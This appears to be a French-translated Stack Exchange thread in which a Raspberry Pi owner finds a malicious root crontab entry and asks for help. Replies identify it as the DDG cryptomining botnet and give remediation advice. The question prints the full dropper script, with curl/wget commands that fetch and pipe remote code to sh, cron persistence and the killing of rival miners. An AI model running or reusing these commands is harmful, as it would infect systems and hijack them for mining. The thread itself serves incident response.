Entrée crontab suspecte exécutant 'xribfa4' toutes les 15 minutes

59

Je voulais ajouter quelque chose à mon fichier crontab racine sur mon Raspberry Pi, et j'ai trouvé une entrée qui me paraissait suspecte.

Entrée Crontab:

*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Le contenu de http://103.219.112.66:8000/i.shsont:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)
ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4
if [ ! -f "xribfa4" ]; then
    curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4
fi
chmod +x xribfa4
/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4

ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9

echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -

Ma connaissance de Linux est limitée, mais il me semble que télécharger des fichiers binaires à partir d’un serveur indonésien et les exécuter régulièrement en tant que root n’est pas chose courante.

Qu'est-ce que c'est? Que devrais-je faire?

security cron malware Peter Dam
la source
16
C'est circulaire. Toutes les 15 minutes, il télécharge et installe une nouvelle copie de lui-même. Si / lorsque la copie sur le serveur distant est modifiée, tous les serveurs exécutant ce travail cronjob seront exécutés quel que soit le nouveau code, dans un délai de 15 minutes.
Wildcard
5
Votre framboise pi est-elle ouverte à Internet? Quelle est votre pi framboise en cours d'exécution? Ceci est le seul résultat sur Google lorsque je recherche xribfa4. Si vous n'exécutez pas de logiciel nécessitant cette opération, il s'agit probablement d'un virus.
Kemotep
6
@kemotep cette chaîne est aléatoire, mais google pour l'IP et donne quelques résultats. Quelque chose à propos d’un botnet de mines de
Ddg
9
Je l'ai trouvé. Il est fou que la propriété intellectuelle soit enregistrée sur un site du gouvernement indonésien. On dirait également qu'il y a près de 2000 autres ips fournissant cette charge utile.
Kemotep
21
La principale chose dont vous devez être conscient est que, même si vous supprimez cette entrée crontab, votre système contient probablement la vulnérabilité qui lui a permis d'être infecté. Vous devez trouver et résoudre cette vulnérabilité.
Hans-Martin Mosner

Réponses:

79

Voici comment cela fonctionne:

  1. exploiter une vulnérabilité RCE
  2. modifier la crontab
  3. téléchargement du programme minier approprié (écrit avec aller)
  4. démarrer le processus d'extraction

DDG: un botnet minier visant des serveurs de bases de données

SystemdMiner lorsqu'un botnet emprunte l'infrastructure d'un autre botnet

U & L: Comment puis-je supprimer les logiciels malveillants Minerd sur une instance AWS EC2? (serveur compromis)

GAD3R
la source
4
Oui, il semble en fait que ça y est. Merci! Marquera cela comme une réponse, si rien de nouveau ne se présente.
Peter Dam
8
N'oubliez pas le conseil habituel pour une machine enracinée: essayez de comprendre comment elle est entrée afin de réparer le trou. Apprenez de cela et augmentez votre sécurité. Enfin, supprimez et réinstallez la machine.
Marcel
3
La bonne nouvelle est qu’ils ne semblent pas avoir de mineur pour le Pi, mais uniquement pour i686 et x86_64.
Marc
13
@ Mark Comment est-ce une bonne nouvelle? Quelqu'un a obtenu le contrôle total de son Pi en utilisant un point d’entrée inconnu et a eu un accès complet à tous les secrets du Pi (y compris, mais sans s'y limiter, les mots de passe). Que le mineur travaille ou non, cela relève vraiment du "petit inconvénient".
marcelm
4
@marcelm, l'attaquant a eu le plein contrôle de celui-ci et n'a presque certainement rien fait de significatif avec ce contrôle.
Marc
2

Déterminez quels ports TCP et UDP sont réellement nécessaires, puis bloquez tous les autres ports du pare-feu de votre routeur. Il est possible que ces entrées crontab ne réapparaissent pas.

Vous pouvez voir quels ports sont ouverts et publics à l’aide de Shields Up! en vedette sur grc.com .

Mike Waters
la source
5
Ou il pourrait corriger la vulnérabilité.
Harper - Rétablir Monica
1
@Harper Absolutely! C'est une donnée. Je pensais que peut-être sans bloquer d'abord les ports inutilisés, il pourrait être réinfecté pendant qu'il essayait de le corriger.
Mike Waters
1
Commentaire pertinent de security.SE: security.stackexchange.com/questions/147770/…
Wildcard
1
Ceci (sans se limiter à TCP et UDP, cependant), toujours. Modèle de sécurité positive Aka, liste blanche ou refus par défaut - refusez tout le trafic que vous n'utilisez pas explicitement ou dont vous n'avez pas besoin - le seul moyen de garantir qu'aucun de vos trous ne soit exposé à la pénétration.
antichris